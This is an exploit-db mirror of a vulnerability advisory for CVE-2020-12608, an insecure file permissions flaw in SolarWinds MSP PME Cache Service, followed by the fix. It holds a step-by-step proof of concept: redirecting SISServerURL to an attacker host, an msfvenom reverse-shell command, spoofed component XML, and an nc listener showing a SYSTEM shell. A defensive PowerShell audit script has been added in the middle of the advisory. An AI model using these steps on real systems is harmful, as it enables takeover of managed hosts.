SolarWinds MSP PME Cache Service 1.1.14 – Insecure File Permissions

  • Author: Jens Regel
  • Date: 2020-05-11
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/48448/
    # Title: SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions
    # Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
    # Date: 2020-05-06
    # Vendor: https://www.solarwindsmsp.com/
    # CVE: CVE-2020-12608
    # GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608
    # CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]
    # CWE: 276
    
    Vulnerable version
    ==================
    SolarWinds MSP PME (Patch Management Engine) before 1.1.15
    
    Timeline
    ========
    2020-04-24 Vulnerability discovered
    2020-04-27 Send details to SolarWinds PSIRT
    2020-04-27 SolarWinds confirmed the vulnerability
    2020-05-05 SolarWinds released PME version 1.1.15
    2020-05-06 Public disclosure
    
    Description
    ===========
    An insecure file permissions issue exists in the SolarWinds MSP Cache
    Service, which is part of the Advanced Monitoring Agent, and can lead to
    code execution. The SolarWinds MSP Cache Service is typically used to
    fetch new update definition files and versions for ThirdPartyPatch.exe
    or the SolarWinds MSP Patch Management Engine Setup. The XML file
    CacheService.xml in %PROGRAMDATA%\SolarWinds
    MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so
    the parameter SISServerURL, which controls the location from which
    updates are downloaded, can be changed. After some analysis, we were
    able to serve modified XML files (PMESetup_details.xml and
    ThirdPartyPatch_details.xml) from a web server under our control, set as
    SISServerURL, that point the SolarWinds MSP Cache Service to an
    executable file carrying a reverse TCP payload.
    
    Proof of Concept (PoC)
    ======================
    As the icacls output shows, NTFS Modify permission (M) on
    CacheService.xml is granted to the built-in Users group by default, so
    any user on the system who is a member of Users can change the file
    content. This is an especially big problem on terminal servers and other
    multi-user systems.
    
    PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config> icacls .\CacheService.xml
    .\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
    NT-AUTORITÄT\SYSTEM:(I)(F)
    VORDEFINIERT\Administratoren:(I)(F)
    
    1. Modify CacheService.xml
    
    In the XML file, the SISServerURL parameter was changed so that it now
    points to a web server controlled by the attacker.
    
    <?xml version="1.0" encoding="utf-8"?>
    <Configuration>
    <CachingEnabled>True</CachingEnabled>
    <ApplianceVersion>1.1.14.2223</ApplianceVersion>
    <CacheLocation>C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\cache</CacheLocation>
    <CacheSizeInMB>10240</CacheSizeInMB>
    <SISServerURL>https://evil-attacker.example.org</SISServerURL>
    <LogLevel>5</LogLevel>
    <Proxy></Proxy>
    <ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt>
    <ProxyCacheService />
    <CacheFilesDeleted></CacheFilesDeleted>
    <CacheDeletedInBytes></CacheDeletedInBytes>
    <HostApplication>RMM</HostApplication>
    <CanBypassProxyCacheService>True</CanBypassProxyCacheService>
    <BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds>
    <ComponentUpdateMinutes>300</ComponentUpdateMinutes>
    <ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds>
    </Configuration>
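As an added defensive check that is not part of the advisory, the following PowerShell script audits a single host for the two conditions described above: a low-privilege principal holding write rights on CacheService.xml, and a SISServerURL value that no longer points at the expected update server. The function names, the SID list and $ExpectedUrlPrefix are assumptions of this example; the advisory does not give the legitimate SISServerURL value, so that prefix is a placeholder to be taken from a known-good installation.

```powershell
# Added example, not part of the advisory: audit one host for the condition described above.
# It reports low-privilege principals holding write rights on CacheService.xml and checks
# SISServerURL. $ExpectedUrlPrefix is a placeholder; take it from a known-good installation.
$ConfigPath        = Join-Path $env:ProgramData 'SolarWinds MSP\SolarWinds.MSP.CacheService\config\CacheService.xml'
$ExpectedUrlPrefix = 'https://EXPECTED-UPDATE-SERVER-PLACEHOLDER'

# Bits that let the holder rewrite or replace the file (Modify, shown by icacls as "(M)", includes
# WriteData/AppendData/Delete), plus GENERIC_WRITE and GENERIC_ALL, which inherited ACEs may carry.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
$WriteMask = $WriteMask -bor 0x40000000 -bor 0x10000000

# Compare well-known SIDs, not names, so the check is independent of the OS display language
# (the advisory's icacls output shows German names such as VORDEFINIERT\Benutzer).
$LowPrivSids = @('S-1-5-32-545', 'S-1-5-11', 'S-1-1-0', 'S-1-5-4')  # Users, Authenticated Users, Everyone, INTERACTIVE

function Get-LowPrivWriteAce {
    param([Parameter(Mandatory)][string]$Path)
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # unresolvable account: cannot be one of the well-known groups above
        if (($LowPrivSids -contains $sid) -and (([int]$ace.FileSystemRights -band $WriteMask) -ne 0)) {
            [pscustomobject]@{ Identity = $ace.IdentityReference.Value; Sid = $sid
                               Rights = $ace.FileSystemRights; Inherited = $ace.IsInherited }
        }
    }
}

function Get-SisServerUrl {
    param([Parameter(Mandatory)][string]$Path)
    [xml]$cfg = Get-Content -LiteralPath $Path -Raw
    return [string]$cfg.Configuration.SISServerURL
}

if (-not (Test-Path -LiteralPath $ConfigPath)) { Write-Warning "Not found: $ConfigPath"; return }

$findings = @(Get-LowPrivWriteAce -Path $ConfigPath)
if ($findings.Count -gt 0) {
    Write-Warning 'CacheService.xml is writable by low-privilege principals (CVE-2020-12608 condition):'
    $findings | Format-Table -AutoSize | Out-String | Write-Warning
} else {
    Write-Output 'OK: no low-privilege principal holds write rights on CacheService.xml'
}

$url = Get-SisServerUrl -Path $ConfigPath
if (-not $url.StartsWith($ExpectedUrlPrefix, [System.StringComparison]::OrdinalIgnoreCase)) {
    Write-Warning "SISServerURL is '$url', which does not match the expected update server prefix"
}
```

A finding from the ACL check on a version before 1.1.15 is expected; the SISServerURL check is the one that indicates the file has actually been tampered with.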
    
    2. Payload creation
    
    Generate an executable file, for example using msfvenom, that
    establishes a reverse TCP connection to the attacker, and store it on
    the web server.
    
    msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f exe > /tmp/solarwinds-shell.exe
    
    3. Prepare web server
    
    Place the modified XML files (PMESetup_details.xml or
    ThirdPartyPatch_details.xml) on the web server under the path
    /ComponentData/RMM/1/, calculate the MD5, SHA1 and SHA256 checksums of
    the executable, set the correct value for SizeInBytes and increase the
    version number.
    
    Example of PMESetup_details.xml
    
    <ComponentDetails>
    <Name>Patch Management Engine</Name>
    <Description>Patch Management Engine</Description>
    <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
    <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
    <SHA256Checksum>80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65</SHA256Checksum>
    <SizeInBytes>7168</SizeInBytes>
    <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
    <FileName>solarwinds-shell.exe</FileName>
    <Architecture>x86,x64</Architecture>
    <Locale>all</Locale>
    <Version>1.1.14.2224</Version>
    </ComponentDetails>
    
    Example of ThirdPartyPatch_details.xml
    
    <ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <Name>Third Party Patch</Name>
    <Description>
    Third Party Patch application for Patch Management Engine RMM v 1 and later
    </Description>
    <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
    <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
    <SHA256Checksum>80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65</SHA256Checksum>
    <SizeInBytes>7168</SizeInBytes>
    <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
    <FileName>solarwinds-shell.exe</FileName>
    <Architecture>x86,x64</Architecture>
    <Locale>all</Locale>
    <Version>1.2.1.95</Version>
    </ComponentDetails>
    
    4. Malicious executable download
    
    After restarting the system or reloading the CacheService.xml, the
    service connects to the web server controlled by the attacker and
    downloads the executable file. This is then stored in the path
    %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and
    %PROGRAMDATA%\SolarWinds MSP\PME\archives\.
    
    [24/Apr/2020:10:57:01 +0200] "HEAD /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"
    [24/Apr/2020:10:57:01 +0200] "GET /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"
    
    5. Getting shell
    
    After a certain time the executable file is run by the SolarWinds MSP
    RPC Server service and establishes a connection to the attacker with
    the rights of the SYSTEM user.
    
    [~]: nc -nlvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
    Microsoft Windows [Version 10.0.18363.778]
    (c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.
    
    C:\WINDOWS\system32>whoami
    whoami
    nt-authority\system
    
    C:\WINDOWS\system32>
    
    Fix
    ===
    A new PME version, 1.1.15, fixes the issue and is delivered via
    auto-update:
    https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/